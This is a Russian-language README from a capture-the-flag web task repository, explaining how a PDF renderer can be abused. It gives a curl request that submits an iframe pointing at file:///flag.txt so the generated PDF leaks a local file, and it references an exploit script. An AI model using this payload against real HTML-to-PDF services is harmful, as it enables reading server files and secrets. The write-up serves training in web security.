kernel/Geroi-Kodeksa
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9511b382800edeebbb502a3caf8b81bd6a59de8c
Geroi-Kodeksa/ArchmageScriptorium-Web/README.md
Caplag 9511b38280 Init. commit
2026-03-02 21:44:22 +03:00

1.3 KiB
Raw Blame History

Web 1.1 Cкрипторий Архимага

В Башне Магов спрятан Запретный гримуар. Архимаг печатает свитки, но забывает закрыть доступ к библиотеке башни. Воспользуйтесь скрипториумом, чтобы добыть содержимое гримуара.

Решение

Таск рендерит переданный HTML/Markdown в PDF и позволяет встраивать в сгенерированный файл внешние ресурсы. За счёт этого можно передать в iframe путь file:///flag.txt и заставить рендерер прочитать локальный файл при генерации scroll.pdf.

Для этого отправляем POST на /seal, в поле content передаём HTML с iframe, затем читаем содержимое в готовом PDF.

Пример

Через curl:

curl -s -X POST http://localhost:8000/seal \
  -F 'content=<h1>Королевский Указ</h1><iframe src="file:///flag.txt" style="width:800px;height:200px"></iframe>' \
  -F 'format=html' \
  -o scroll.pdf

Через скрипт solve/exploit.py:

python solve/exploit.py http://localhost:8000
Reference in New Issue View Git Blame Copy Permalink